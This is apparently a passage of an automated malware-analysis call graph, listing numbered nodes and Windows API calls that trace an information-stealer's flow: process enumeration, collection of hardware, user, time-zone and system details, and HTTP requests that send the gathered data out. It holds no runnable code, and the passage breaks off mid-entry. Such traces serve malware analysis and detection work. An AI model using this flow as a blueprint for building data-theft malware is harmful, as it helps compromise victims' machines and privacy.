75580->75581 75582 2a04797 75581->75582 75583 2a047e8 3 API calls 75582->75583 75584 2a047ae 75583->75584 75585 2a047e8 3 API calls 75584->75585 75586 2a047c5 75585->75586 75587 2a047e8 3 API calls 75586->75587 75588 2a047dc 75587->75588 75588->74596 76907 2a2f109 75589->76907 75591 2a1258e CreateToolhelp32Snapshot Process32First 75592 2a125c2 Process32Next 75591->75592 75593 2a125ef CloseHandle 75591->75593 75592->75593 75594 2a125d4 StrCmpCA 75592->75594 76908 2a2f165 75593->76908 75594->75592 75596 2a125e6 75594->75596 75596->75592 75599 2a104e7 lstrcpy 75598->75599 75600 2a11c67 75599->75600 75601 2a104e7 lstrcpy 75600->75601 75602 2a11c75 GetSystemTime 75601->75602 75603 2a11c91 75602->75603 75604 2a1d016 ___init_ctype 5 API calls 75603->75604 75605 2a11cc8 75604->75605 75605->74603 75608 2a105e1 75606->75608 75607 2a10605 75607->74618 75608->75607 75609 2a105f3 lstrcpy lstrcat 75608->75609 75609->75607 75611 2a10519 lstrcpy 75610->75611 75612 2a01d07 75611->75612 75613 2a10519 lstrcpy 75612->75613 75614 2a01d12 75613->75614 75615 2a10519 lstrcpy 75614->75615 75616 2a01d1d 75615->75616 75617 2a10519 lstrcpy 75616->75617 75618 2a01d34 75617->75618 75619 2a169b6 75618->75619 75620 2a10549 2 API calls 75619->75620 75621 2a169ec 75620->75621 75622 2a10549 2 API calls 75621->75622 75623 2a169f9 75622->75623 75624 2a10549 2 API calls 75623->75624 75625 2a16a06 75624->75625 75626 2a104e7 lstrcpy 75625->75626 75627 2a16a13 75626->75627 75628 2a104e7 lstrcpy 75627->75628 75629 2a16a20 75628->75629 75630 2a104e7 lstrcpy 75629->75630 75631 2a16a2d 75630->75631 75632 2a104e7 lstrcpy 75631->75632 75633 2a16a3a 75632->75633 75634 2a104e7 lstrcpy 75633->75634 75635 2a16a47 75634->75635 75636 2a104e7 lstrcpy 75635->75636 75639 2a16a54 75636->75639 75640 2a16a98 StrCmpCA 75639->75640 75641 2a16af1 StrCmpCA 75639->75641 75651 2a168c6 33 API calls 75639->75651 75654 2a16b51 StrCmpCA 75639->75654 75656 2a16baa StrCmpCA 75639->75656 75667 2a10519 lstrcpy 75639->75667 75678 2a01cfd lstrcpy 75639->75678 75687 2a1683e 28 API calls 75639->75687 75691 2a1058d lstrcpy 75639->75691 76911 2a029f8 75639->76911 76914 2a02a09 75639->76914 76917 2a02a1a 75639->76917 76927 2a02a2b lstrcpy 75639->76927 76928 2a02a3c lstrcpy 75639->76928 76929 2a02a4d lstrcpy 75639->76929 75640->75639 75640->75641 75641->75639 75642 2a16cd4 75641->75642 75645 2a1058d lstrcpy 75642->75645 75646 2a16cdf 75645->75646 75648 2a104e7 lstrcpy 75646->75648 75649 2a16cec 75648->75649 75650 2a1058d lstrcpy 75649->75650 75685 2a16c2c 75650->75685 75651->75639 75652 2a104e7 lstrcpy 75653 2a16d0b 75652->75653 75655 2a1058d lstrcpy 75653->75655 75654->75639 75654->75656 75657 2a16d15 75655->75657 75658 2a16bc0 StrCmpCA 75656->75658 75659 2a16ca3 75656->75659 76920 2a16da2 75657->76920 75662 2a16c72 75658->75662 75663 2a16bd6 StrCmpCA 75658->75663 75661 2a1058d lstrcpy 75659->75661 75664 2a16cae 75661->75664 75668 2a1058d lstrcpy 75662->75668 75665 2a16be8 StrCmpCA 75663->75665 75666 2a16c3e 75663->75666 75671 2a104e7 lstrcpy 75664->75671 75672 2a16c0a 75665->75672 75673 2a16bfa Sleep 75665->75673 75670 2a1058d lstrcpy 75666->75670 75667->75639 75674 2a16c7d 75668->75674 75675 2a16c49 75670->75675 75676 2a16cbb 75671->75676 75677 2a1058d lstrcpy 75672->75677 75673->75639 75679 2a104e7 lstrcpy 75674->75679 75680 2a104e7 lstrcpy 75675->75680 75681 2a1058d lstrcpy 75676->75681 75682 2a16c15 75677->75682 75678->75639 75683 2a16c8a 75679->75683 75684 2a16c56 75680->75684 75681->75685 75686 2a104e7 lstrcpy 75682->75686 75688 2a1058d lstrcpy 75683->75688 75689 2a1058d lstrcpy 75684->75689 75685->75652 75690 2a16c22 75686->75690 75687->75639 75688->75685 75689->75685 75692 2a1058d lstrcpy 75690->75692 75691->75639 75692->75685 75693 2a16d28 75693->74630 75695 2a1058d lstrcpy 75694->75695 75696 2a18257 75695->75696 75697 2a1058d lstrcpy 75696->75697 75698 2a18262 75697->75698 75699 2a1058d lstrcpy 75698->75699 75700 2a1826d 75699->75700 75700->74633 75702 2a10529 75701->75702 75703 2a1053e 75702->75703 75704 2a10536 lstrcpy 75702->75704 75703->74646 75704->75703 75706 2a109e6 GetVolumeInformationA 75705->75706 75707 2a109df 75705->75707 75708 2a10a4d 75706->75708 75707->75706 75708->75708 75709 2a10a62 GetProcessHeap RtlAllocateHeap 75708->75709 75710 2a10a7d 75709->75710 75711 2a10a8c wsprintfA lstrcat 75709->75711 75712 2a104e7 lstrcpy 75710->75712 76930 2a11684 GetCurrentHwProfileA 75711->76930 75714 2a10a85 75712->75714 75717 2a1d016 ___init_ctype 5 API calls 75714->75717 75715 2a10ac7 lstrlen 76946 2a123d5 lstrcpy malloc strncpy 75715->76946 75719 2a10b2e 75717->75719 75718 2a10aea lstrcat 75720 2a10b01 75718->75720 75719->74673 75721 2a104e7 lstrcpy 75720->75721 75722 2a10b18 75721->75722 75722->75714 75724 2a10519 lstrcpy 75723->75724 75725 2a04b59 75724->75725 76950 2a04ab6 75725->76950 75727 2a04b65 75728 2a104e7 lstrcpy 75727->75728 75729 2a04b81 75728->75729 75730 2a104e7 lstrcpy 75729->75730 75731 2a04b91 75730->75731 75732 2a104e7 lstrcpy 75731->75732 75733 2a04ba1 75732->75733 75734 2a104e7 lstrcpy 75733->75734 75735 2a04bb1 75734->75735 75736 2a104e7 lstrcpy 75735->75736 75737 2a04bc1 InternetOpenA StrCmpCA 75736->75737 75738 2a04bf5 75737->75738 75739 2a05194 InternetCloseHandle 75738->75739 75740 2a11c4a 7 API calls 75738->75740 75750 2a051e1 75739->75750 75741 2a04c15 75740->75741 75742 2a105c7 2 API calls 75741->75742 75743 2a04c28 75742->75743 75744 2a1058d lstrcpy 75743->75744 75745 2a04c33 75744->75745 75746 2a10609 3 API calls 75745->75746 75747 2a04c5f 75746->75747 75748 2a1058d lstrcpy 75747->75748 75749 2a04c6a 75748->75749 75752 2a10609 3 API calls 75749->75752 75751 2a1d016 ___init_ctype 5 API calls 75750->75751 75753 2a05235 75751->75753 75754 2a04c8b 75752->75754 75856 2a139c2 StrCmpCA 75753->75856 75755 2a1058d lstrcpy 75754->75755 75756 2a04c96 75755->75756 75757 2a105c7 2 API calls 75756->75757 75758 2a04cb8 75757->75758 75759 2a1058d lstrcpy 75758->75759 75760 2a04cc3 75759->75760 75761 2a10609 3 API calls 75760->75761 75762 2a04ce4 75761->75762 75763 2a1058d lstrcpy 75762->75763 75764 2a04cef 75763->75764 75765 2a10609 3 API calls 75764->75765 75766 2a04d10 75765->75766 75767 2a1058d lstrcpy 75766->75767 75768 2a04d1b 75767->75768 75769 2a10609 3 API calls 75768->75769 75770 2a04d3d 75769->75770 75771 2a105c7 2 API calls 75770->75771 75772 2a04d48 75771->75772 75773 2a1058d lstrcpy 75772->75773 75774 2a04d53 75773->75774 75775 2a04d69 InternetConnectA 75774->75775 75775->75739 75776 2a04d97 HttpOpenRequestA 75775->75776 75777 2a04dd7 75776->75777 75778 2a05188 InternetCloseHandle 75776->75778 75779 2a04dfb 75777->75779 75780 2a04ddf InternetSetOptionA 75777->75780 75778->75739 75781 2a10609 3 API calls 75779->75781 75780->75779 75782 2a04e11 75781->75782 75783 2a1058d lstrcpy 75782->75783 75784 2a04e1c 75783->75784 75785 2a105c7 2 API calls 75784->75785 75786 2a04e3e 75785->75786 75787 2a1058d lstrcpy 75786->75787 75788 2a04e49 75787->75788 75789 2a10609 3 API calls 75788->75789 75790 2a04e6a 75789->75790 75791 2a1058d lstrcpy 75790->75791 75792 2a04e75 75791->75792 75793 2a10609 3 API calls 75792->75793 75794 2a04e97 75793->75794 75795 2a1058d lstrcpy 75794->75795 75796 2a04ea2 75795->75796 75797 2a10609 3 API calls 75796->75797 75798 2a04ec3 75797->75798 75799 2a1058d lstrcpy 75798->75799 75800 2a04ece 75799->75800 75801 2a10609 3 API calls 75800->75801 75802 2a04eef 75801->75802 75803 2a1058d lstrcpy 75802->75803 75804 2a04efa 75803->75804 75805 2a105c7 2 API calls 75804->75805 75806 2a04f19 75805->75806 75807 2a1058d lstrcpy 75806->75807 75808 2a04f24 75807->75808 75809 2a10609 3 API calls 75808->75809 75810 2a04f45 75809->75810 75811 2a1058d lstrcpy 75810->75811 75812 2a04f50 75811->75812 75813 2a10609 3 API calls 75812->75813 75814 2a04f71 75813->75814 75815 2a1058d lstrcpy 75814->75815 75816 2a04f7c 75815->75816 75817 2a105c7 2 API calls 75816->75817 75818 2a04f9e 75817->75818 75819 2a1058d lstrcpy 75818->75819 75820 2a04fa9 75819->75820 75821 2a10609 3 API calls 75820->75821 75822 2a04fca 75821->75822 75823 2a1058d lstrcpy 75822->75823 75824 2a04fd5 75823->75824 75825 2a10609 3 API calls 75824->75825 75826 2a04ff7 75825->75826 75827 2a1058d lstrcpy 75826->75827 75828 2a05002 75827->75828 75829 2a10609 3 API calls 75828->75829 75830 2a05023 75829->75830 75831 2a1058d lstrcpy 75830->75831 75832 2a0502e 75831->75832 75833 2a10609 3 API calls 75832->75833 75834 2a0504f 75833->75834 75835 2a1058d lstrcpy 75834->75835 75836 2a0505a 75835->75836 75837 2a105c7 2 API calls 75836->75837 75838 2a05079 75837->75838 75839 2a1058d lstrcpy 75838->75839 75840 2a05084 75839->75840 75841 2a104e7 lstrcpy 75840->75841 75842 2a0509f 75841->75842 75843 2a105c7 2 API calls 75842->75843 75844 2a050b6 75843->75844 75845 2a105c7 2 API calls 75844->75845 75846 2a050c7 75845->75846 75847 2a1058d lstrcpy 75846->75847 75848 2a050d2 75847->75848 75849 2a050e8 lstrlen lstrlen HttpSendRequestA 75848->75849 75850 2a0515c InternetReadFile 75849->75850 75851 2a05176 InternetCloseHandle 75850->75851 75854 2a0511c 75850->75854 75852 2a02920 75851->75852 75852->75778 75853 2a10609 3 API calls 75853->75854 75854->75850 75854->75851 75854->75853 75855 2a1058d lstrcpy 75854->75855 75855->75854 75857 2a139e1 ExitProcess 75856->75857 75858 2a139e8 strtok_s 75856->75858 75860 2a13b48 75858->75860 75872 2a13a04 75858->75872 75859 2a13b2a strtok_s 75859->75860 75859->75872 75860->74681 75861 2a13a21 StrCmpCA 75861->75859 75861->75872 75862 2a13a75 StrCmpCA 75862->75859 75862->75872 75863 2a13ab4 StrCmpCA 75863->75859 75863->75872 75864 2a13af4 StrCmpCA 75864->75859 75865 2a13b16 StrCmpCA 75865->75859 75866 2a13a59 StrCmpCA 75866->75859 75866->75872 75867 2a13ac9 StrCmpCA 75867->75859 75867->75872 75868 2a13a3d StrCmpCA 75868->75859 75868->75872 75869 2a13a9f StrCmpCA 75869->75859 75869->75872 75870 2a13ade StrCmpCA 75870->75859 75871 2a10549 2 API calls 75871->75872 75872->75859 75872->75861 75872->75862 75872->75863 75872->75864 75872->75865 75872->75866 75872->75867 75872->75868 75872->75869 75872->75870 75872->75871 75874 2a10519 lstrcpy 75873->75874 75875 2a05f64 75874->75875 75876 2a04ab6 5 API calls 75875->75876 75877 2a05f70 75876->75877 75878 2a104e7 lstrcpy 75877->75878 75879 2a05f8c 75878->75879 75880 2a104e7 lstrcpy 75879->75880 75881 2a05f9c 75880->75881 75882 2a104e7 lstrcpy 75881->75882 75883 2a05fac 75882->75883 75884 2a104e7 lstrcpy 75883->75884 75885 2a05fbc 75884->75885 75886 2a104e7 lstrcpy 75885->75886 75887 2a05fcc InternetOpenA StrCmpCA 75886->75887 75888 2a06000 75887->75888 75889 2a066ff InternetCloseHandle 75888->75889 75891 2a11c4a 7 API calls 75888->75891 76956 2a08048 CryptStringToBinaryA 75889->76956 75893 2a06020 75891->75893 75894 2a105c7 2 API calls 75893->75894 75896 2a06033 75894->75896 75895 2a10549 2 API calls 75897 2a06739 75895->75897 75898 2a1058d lstrcpy 75896->75898 75899 2a10609 3 API calls 75897->75899 75902 2a0603e 75898->75902 75900 2a06750 75899->75900 75901 2a1058d lstrcpy 75900->75901 75907 2a0675b 75901->75907 75903 2a10609 3 API calls 75902->75903 75904 2a0606a 75903->75904 75905 2a1058d lstrcpy 75904->75905 75906 2a06075 75905->75906 75910 2a10609 3 API calls 75906->75910 75908 2a1d016 ___init_ctype 5 API calls 75907->75908 75909 2a067eb 75908->75909 76040 2a1343f strtok_s 75909->76040 75911 2a06096 75910->75911 75912 2a1058d lstrcpy 75911->75912 75913 2a060a1 75912->75913 75914 2a105c7 2 API calls 75913->75914 75915 2a060c3 75914->75915 75916 2a1058d lstrcpy 75915->75916 75917 2a060ce 75916->75917 75918 2a10609 3 API calls 75917->75918 75919 2a060ef 75918->75919 75920 2a1058d lstrcpy 75919->75920 75921 2a060fa 75920->75921 75922 2a10609 3 API calls 75921->75922 75923 2a0611b 75922->75923 75924 2a1058d lstrcpy 75923->75924 75925 2a06126 75924->75925 75926 2a10609 3 API calls 75925->75926 75927 2a06148 75926->75927 75928 2a105c7 2 API calls 75927->75928 75929 2a06153 75928->75929 75930 2a1058d lstrcpy 75929->75930 75931 2a0615e 75930->75931 75932 2a06174 InternetConnectA 75931->75932 75932->75889 75933 2a061a2 HttpOpenRequestA 75932->75933 75934 2a061e2 75933->75934 75935 2a066f3 InternetCloseHandle 75933->75935 75936 2a06206 75934->75936 75937 2a061ea InternetSetOptionA 75934->75937 75935->75889 75938 2a10609 3 API calls 75936->75938 75937->75936 75939 2a0621c 75938->75939 75940 2a1058d lstrcpy 75939->75940 75941 2a06227 75940->75941 75942 2a105c7 2 API calls 75941->75942 75943 2a06249 75942->75943 75944 2a1058d lstrcpy 75943->75944 75945 2a06254 75944->75945 75946 2a10609 3 API calls 75945->75946 75947 2a06275 75946->75947 75948 2a1058d lstrcpy 75947->75948 75949 2a06280 75948->75949 75950 2a10609 3 API calls 75949->75950 75951 2a062a2 75950->75951 75952 2a1058d lstrcpy 75951->75952 75953 2a062ad 75952->75953 75954 2a10609 3 API calls 75953->75954 75955 2a062cf 75954->75955 75956 2a1058d lstrcpy 75955->75956 75957 2a062da 75956->75957 75958 2a10609 3 API calls 75957->75958 75959 2a062fb 75958->75959 75960 2a1058d lstrcpy 75959->75960 75961 2a06306 75960->75961 75962 2a105c7 2 API calls 75961->75962 75963 2a06325 75962->75963 75964 2a1058d lstrcpy 75963->75964 75965 2a06330 75964->75965 75966 2a10609 3 API calls 75965->75966 75967 2a06351 75966->75967 75968 2a1058d lstrcpy 75967->75968 75969 2a0635c 75968->75969 75970 2a10609 3 API calls 75969->75970 75971 2a0637d 75970->75971 75972 2a1058d lstrcpy 75971->75972 75973 2a06388 75972->75973 75974 2a105c7 2 API calls 75973->75974 75975 2a063aa 75974->75975 75976 2a1058d lstrcpy 75975->75976 75977 2a063b5 75976->75977 75978 2a10609 3 API calls 75977->75978 75979 2a063d6 75978->75979 75980 2a1058d lstrcpy 75979->75980 75981 2a063e1 75980->75981 75982 2a10609 3 API calls 75981->75982 75983 2a06403 75982->75983 75984 2a1058d lstrcpy 75983->75984 75985 2a0640e 75984->75985 75986 2a10609 3 API calls 75985->75986 75987 2a0642f 75986->75987 75988 2a1058d lstrcpy 75987->75988 75989 2a0643a 75988->75989 75990 2a10609 3 API calls 75989->75990 75991 2a0645b 75990->75991 75992 2a1058d lstrcpy 75991->75992 75993 2a06466 75992->75993 75994 2a10609 3 API calls 75993->75994 75995 2a06487 75994->75995 75996 2a1058d lstrcpy 75995->75996 75997 2a06492 75996->75997 75998 2a10609 3 API calls 75997->75998 75999 2a064b3 75998->75999 76000 2a1058d lstrcpy 75999->76000 76001 2a064be 76000->76001 76002 2a10609 3 API calls 76001->76002 76003 2a064df 76002->76003 76004 2a1058d lstrcpy 76003->76004 76005 2a064ea 76004->76005 76006 2a105c7 2 API calls 76005->76006 76007 2a06506 76006->76007 76008 2a1058d lstrcpy 76007->76008 76009 2a06511 76008->76009 76010 2a10609 3 API calls 76009->76010 76011 2a06532 76010->76011 76012 2a1058d lstrcpy 76011->76012 76013 2a0653d 76012->76013 76014 2a10609 3 API calls 76013->76014 76015 2a0655f 76014->76015 76016 2a1058d lstrcpy 76015->76016 76017 2a0656a 76016->76017 76018 2a10609 3 API calls 76017->76018 76019 2a0658b 76018->76019 76020 2a1058d lstrcpy 76019->76020 76021 2a06596 76020->76021 76022 2a10609 3 API calls 76021->76022 76023 2a065b7 76022->76023 76024 2a1058d lstrcpy 76023->76024 76025 2a065c2 76024->76025 76026 2a105c7 2 API calls 76025->76026 76027 2a065e1 76026->76027 76028 2a1058d lstrcpy 76027->76028 76029 2a065ec 76028->76029 76030 2a065f7 lstrlen lstrlen GetProcessHeap RtlAllocateHeap lstrlen 76029->76030 76954 2a27050 76030->76954 76032 2a0663e lstrlen lstrlen 76033 2a27050 _memmove 76032->76033 76034 2a06667 lstrlen HttpSendRequestA 76033->76034 76035 2a066d2 InternetReadFile 76034->76035 76036 2a066ec InternetCloseHandle 76035->76036 76038 2a06692 76035->76038 76036->75935 76037 2a10609 3 API calls 76037->76038 76038->76035 76038->76036 76038->76037 76039 2a1058d lstrcpy 76038->76039 76039->76038 76041 2a134cc 76040->76041 76043 2a1346e 76040->76043 76041->74696 76042 2a134b6 strtok_s 76042->76041 76042->76043 76043->76042 76044 2a10549 2 API calls 76043->76044 76045 2a10549 2 API calls 76043->76045 76044->76042 76045->76043 76049 2a13286 76046->76049 76047 2a13385 76047->74709 76048 2a13332 StrCmpCA 76048->76049 76049->76047 76049->76048 76050 2a10549 2 API calls 76049->76050 76051 2a13367 strtok_s 76049->76051 76052 2a13301 StrCmpCA 76049->76052 76053 2a132dc StrCmpCA 76049->76053 76054 2a132ab StrCmpCA 76049->76054 76050->76049 76051->76049 76052->76049 76053->76049 76054->76049 76056 2a13434 76055->76056 76059 2a133bc 76055->76059 76056->74722 76057 2a10549 2 API calls 76060 2a1341a strtok_s 76057->76060 76058 2a133e2 StrCmpCA 76058->76059 76059->76057 76059->76058 76059->76060 76061 2a10549 2 API calls 76059->76061 76060->76056 76060->76059 76061->76059 76063 2a104e7 lstrcpy 76062->76063 76064 2a13b9f 76063->76064 76065 2a10609 3 API calls 76064->76065 76066 2a13baf 76065->76066 76067 2a1058d lstrcpy 76066->76067 76068 2a13bb7 76067->76068 76069 2a10609 3 API calls 76068->76069 76070 2a13bcf 76069->76070 76071 2a1058d lstrcpy 76070->76071 76072 2a13bd7 76071->76072 76073 2a10609 3 API calls 76072->76073 76074 2a13bef 76073->76074 76075 2a1058d lstrcpy 76074->76075 76076 2a13bf7 76075->76076 76077 2a10609 3 API calls 76076->76077 76078 2a13c0f 76077->76078 76079 2a1058d lstrcpy 76078->76079 76080 2a13c17 76079->76080 76081 2a10609 3 API calls 76080->76081 76082 2a13c2f 76081->76082 76083 2a1058d lstrcpy 76082->76083 76084 2a13c37 76083->76084 76961 2a10cc0 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 76084->76961 76087 2a10609 3 API calls 76088 2a13c50 76087->76088 76089 2a1058d lstrcpy 76088->76089 76090 2a13c58 76089->76090 76091 2a10609 3 API calls 76090->76091 76092 2a13c70 76091->76092 76093 2a1058d lstrcpy 76092->76093 76094 2a13c78 76093->76094 76095 2a10609 3 API calls 76094->76095 76096 2a13c90 76095->76096 76097 2a1058d lstrcpy 76096->76097 76098 2a13c98 76097->76098 76964 2a115d4 76098->76964 76101 2a10609 3 API calls 76102 2a13cb1 76101->76102 76103 2a1058d lstrcpy 76102->76103 76104 2a13cb9 76103->76104 76105 2a10609 3 API calls 76104->76105 76106 2a13cd1 76105->76106 76107 2a1058d lstrcpy 76106->76107 76108 2a13cd9 76107->76108 76109 2a10609 3 API calls 76108->76109 76110 2a13cf1 76109->76110 76111 2a1058d lstrcpy 76110->76111 76112 2a13cf9 76111->76112 76113 2a11684 11 API calls 76112->76113 76114 2a13d09 76113->76114 76115 2a105c7 2 API calls 76114->76115 76116 2a13d16 76115->76116 76117 2a1058d lstrcpy 76116->76117 76118 2a13d1e 76117->76118 76119 2a10609 3 API calls 76118->76119 76120 2a13d3e 76119->76120 76121 2a1058d lstrcpy 76120->76121 76122 2a13d46 76121->76122 76123 2a10609 3 API calls 76122->76123 76124 2a13d5e 76123->76124 76125 2a1058d lstrcpy 76124->76125 76126 2a13d66 76125->76126 76127 2a109a2 19 API calls 76126->76127 76128 2a13d76 76127->76128 76129 2a105c7 2 API calls 76128->76129 76130 2a13d83 76129->76130 76131 2a1058d lstrcpy 76130->76131 76132 2a13d8b 76131->76132 76133 2a10609 3 API calls 76132->76133 76134 2a13dab 76133->76134 76135 2a1058d lstrcpy 76134->76135 76136 2a13db3 76135->76136 76137 2a10609 3 API calls 76136->76137 76138 2a13dcb 76137->76138 76139 2a1058d lstrcpy 76138->76139 76140 2a13dd3 76139->76140 76141 2a13ddb GetCurrentProcessId 76140->76141 76971 2a1224a OpenProcess 76141->76971 76144 2a105c7 2 API calls 76145 2a13df8 76144->76145 76146 2a1058d lstrcpy 76145->76146 76147 2a13e00 76146->76147 76148 2a10609 3 API calls 76147->76148 76149 2a13e20 76148->76149 76150 2a1058d lstrcpy 76149->76150 76151 2a13e28 76150->76151 76152 2a10609 3 API calls 76151->76152 76153 2a13e40 76152->76153 76154 2a1058d lstrcpy 76153->76154 76155 2a13e48 76154->76155 76156 2a10609 3 API calls 76155->76156 76157 2a13e60 76156->76157 76158 2a1058d lstrcpy 76157->76158 76159 2a13e68 76158->76159 76160 2a10609 3 API calls 76159->76160 76161 2a13e80 76160->76161 76162 2a1058d lstrcpy 76161->76162 76163 2a13e88 76162->76163 76978 2a10b30 GetProcessHeap RtlAllocateHeap 76163->76978 76166 2a10609 3 API calls 76167 2a13ea1 76166->76167 76168 2a1058d lstrcpy 76167->76168 76169 2a13ea9 76168->76169 76170 2a10609 3 API calls 76169->76170 76171 2a13ec1 76170->76171 76172 2a1058d lstrcpy 76171->76172 76173 2a13ec9 76172->76173 76174 2a10609 3 API calls 76173->76174 76175 2a13ee1 76174->76175 76176 2a1058d lstrcpy 76175->76176 76177 2a13ee9 76176->76177 76985 2a11807 76177->76985 76180 2a105c7 2 API calls 76181 2a13f06 76180->76181 76182 2a1058d lstrcpy 76181->76182 76183 2a13f0e 76182->76183 76184 2a10609 3 API calls 76183->76184 76185 2a13f2e 76184->76185 76186 2a1058d lstrcpy 76185->76186 76187 2a13f36 76186->76187 76188 2a10609 3 API calls 76187->76188 76189 2a13f4e 76188->76189 76190 2a1058d lstrcpy 76189->76190 76191 2a13f56 76190->76191 77002 2a11997 76191->77002 76193 2a13f67 76194 2a105c7 2 API calls 76193->76194 76195 2a13f75 76194->76195 76196 2a1058d lstrcpy 76195->76196 76197 2a13f7d 76196->76197 76198 2a10609 3 API calls 76197->76198 76199 2a13f9d 76198->76199 76200 2a1058d lstrcpy 76199->76200 76201 2a13fa5 76200->76201 76202 2a10609 3 API calls 76201->76202 76203 2a13fbd 76202->76203 76204 2a1058d lstrcpy 76203->76204 76205 2a13fc5 76204->76205 76206 2a10c85 3 API calls 76205->76206 76207 2a13fd2 76206->76207 76208 2a10609 3 API calls 76207->76208 76209 2a13fde 76208->76209 76210 2a1058d lstrcpy 76209->76210 76211 2a13fe6 76210->76211 76212 2a10609 3 API calls 76211->76212 76213 2a13ffe 76212->76213 76214 2a1058d lstrcpy 76213->76214 76215 2a14006 76214->76215 76216 2a10609 3 API calls 76215->76216 76217 2a1401e 76216->76217 76218 2a1058d lstrcpy 76217->76218 76219 2a14026 76218->76219 77017 2a10c53 GetProcessHeap RtlAllocateHeap GetUserNameA 76219->77017 76221 2a14033 76222 2a10609 3 API calls 76221->76222 76223 2a1403f 76222->76223 76224 2a1058d lstrcpy 76223->76224 76225 2a14047 76224->76225 76226 2a10609 3 API calls 76225->76226 76227 2a1405f 76226->76227 76228 2a1058d lstrcpy 76227->76228 76229 2a14067 76228->76229 76230 2a10609 3 API calls 76229->76230 76231 2a1407f 76230->76231 76232 2a1058d lstrcpy 76231->76232 76233 2a14087 76232->76233 77018 2a11563 7 API calls 76233->77018 76236 2a105c7 2 API calls 76237 2a140a6 76236->76237 76238 2a1058d lstrcpy 76237->76238 76239 2a140ae 76238->76239 76240 2a10609 3 API calls 76239->76240 76241 2a140ce 76240->76241 76242 2a1058d lstrcpy 76241->76242 76243 2a140d6 76242->76243 76244 2a10609 3 API calls 76243->76244 76245 2a140ee 76244->76245 76246 2a1058d lstrcpy 76245->76246 76247 2a140f6 76246->76247 77021 2a10ddb 76247->77021 76250 2a105c7 2 API calls 76251 2a14113 76250->76251 76252 2a1058d lstrcpy 76251->76252 76253 2a1411b 76252->76253 76254 2a10609 3 API calls 76253->76254 76255 2a1413b 76254->76255 76256 2a1058d lstrcpy 76255->76256 76257 2a14143 76256->76257 76258 2a10609 3 API calls 76257->76258 76259 2a1415b 76258->76259 76260 2a1058d lstrcpy 76259->76260 76261 2a14163 76260->76261 76262 2a10cc0 9 API calls 76261->76262 76263 2a14170 76262->76263 76264 2a10609 3 API calls 76263->76264 76265 2a1417c 76264->76265 76266 2a1058d lstrcpy 76265->76266 76267 2a14184 76266->76267 76268 2a10609 3 API calls 76267->76268 76269 2a1419c 76268->76269 76270 2a1058d lstrcpy 76269->76270 76271 2a141a4 76270->76271 76272 2a10609 3 API calls 76271->76272 76273 2a141bc 76272->76273 76274 2a1058d lstrcpy 76273->76274 76275 2a141c4 76274->76275 77033 2a10d2e GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 76275->77033 76278 2a10609 3 API calls 76279 2a141dd 76278->76279 76280 2a1058d lstrcpy 76279->76280 76281 2a141e5 76280->76281 76282 2a10609 3 API calls 76281->76282 76283 2a141fd 76282->76283 76284 2a1058d lstrcpy 76283->76284 76285 2a14205 76284->76285 76286 2a10609 3 API calls 76285->76286 76287 2a1421d 76286->76287 76288 2a1058d lstrcpy 76287->76288 76289 2a14225 76288->76289 76290 2a10609 3 API calls 76289->76290 76291 2a1423d 76290->76291 76292 2a1058d lstrcpy 76291->76292 76293 2a14245 76292->76293 77038 2a10f51 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 76293->77038 76295 2a14252 76296 2a10609 3 API calls 76295->76296 76297 2a1425e 76296->76297 76298 2a1058d lstrcpy 76297->76298 76299 2a14266 76298->76299 76300 2a10609 3 API calls 76299->76300 76301 2a1427e 76300->76301 76302 2a1058d lstrcpy 76301->76302 76303 2a14286 76302->76303 76304 2a10609 3 API calls 76303->76304 76305 2a1429e 76304->76305 76306 2a1058d lstrcpy 76305->76306 76307 2a142a6 76306->76307 77041 2a11007 76307->77041 76310 2a10609 3 API calls 76311 2a142bf 76310->76311 76312 2a1058d lstrcpy 76311->76312 76313 2a142c7 76312->76313 76314 2a10609 3 API calls 76313->76314 76315 2a142df 76314->76315 76316 2a1058d lstrcpy 76315->76316 76317 2a142e7 76316->76317 76318 2a10609 3 API calls 76317->76318 76319 2a142ff 76318->76319 76320 2a1058d lstrcpy 76319->76320 76321 2a14307 76320->76321 77056 2a10fba GetSystemInfo wsprintfA 76321->77056 76324 2a10609 3 API calls 76325 2a14320 76324->76325 76326 2a1058d lstrcpy 76325->76326 76327 2a14328 76326->76327 76328 2a10609 3 API calls 76327->76328 76329 2a14340 76328->76329 76330 2a1058d lstrcpy 76329->76330 76331 2a14348 76330->76331 76332 2a10609 3 API calls 76331->76332 76333 2a14360 76332->76333 76334 2a1058d lstrcpy 76333->76334 76335 2a14368 76334->76335 77059 2a11119 GetProcessHeap RtlAllocateHeap 76335->77059 76338 2a10609 3 API calls 76339 2a14381 76338->76339 76340 2a1058d lstrcpy 76339->76340 76341 2a14389 76340->76341 76342 2a10609 3 API calls 76341->76342 76343 2a143a4 76342->76343 76344 2a1058d lstrcpy 76343->76344 76345 2a143ac 76344->76345 76346 2a10609 3 API calls 76345->76346 76347 2a143c7 76346->76347 76348 2a1058d lstrcpy 76347->76348 76349 2a143cf 76348->76349 77066 2a11192 76349->77066 76352 2a105c7 2 API calls 76353 2a143ef 76352->76353 76354 2a1058d lstrcpy 76353->76354 76355 2a143f7 76354->76355 76356 2a10609 3 API calls 76355->76356 76357 2a1441a 76356->76357 76358 2a1058d lstrcpy 76357->76358 76359 2a14422 76358->76359 76360 2a10609 3 API calls 76359->76360 76361 2a1443a 76360->76361 76362 2a1058d lstrcpy 76361->76362 76363 2a14442 76362->76363 77074 2a114a5 76363->77074 76366 2a105c7 2 API calls 76367 2a14462 76366->76367 76368 2a1058d lstrcpy 76367->76368 76369 2a1446a 76368->76369 76370 2a10609 3 API calls 76369->76370 76371 2a14490 76370->76371 76372 2a1058d lstrcpy 76371->76372 76373 2a14498 76372->76373 76374 2a10609 3 API calls 76373->76374 76375 2a144b3 76374->76375 76376 2a1058d lstrcpy 76375->76376 76377 2a144bb 76376->76377 77084 2a11203 76377->77084 76380 2a105c7 2 API calls 76381 2a144e0 76380->76381 76382 2a1058d lstrcpy 76381->76382 76383 2a144e8 76382->76383 76384 2a11203 21 API calls 76383->76384 76385 2a14509 76384->76385 76386 2a105c7 2 API calls 76385->76386 76387 2a14518 76386->76387 76388 2a1058d lstrcpy 76387->76388 76389 2a14520 76388->76389 76390 2a10609 3 API calls 76389->76390 76391 2a14543 76390->76391 76392 2a1058d lstrcpy 76391->76392 76393 2a1454b 76392->76393 76394 2a01cfd lstrcpy 76393->76394 76395 2a14560 lstrlen 76394->76395 76396 2a104e7 lstrcpy 76395->76396 76397 2a1457d 76396->76397 77104 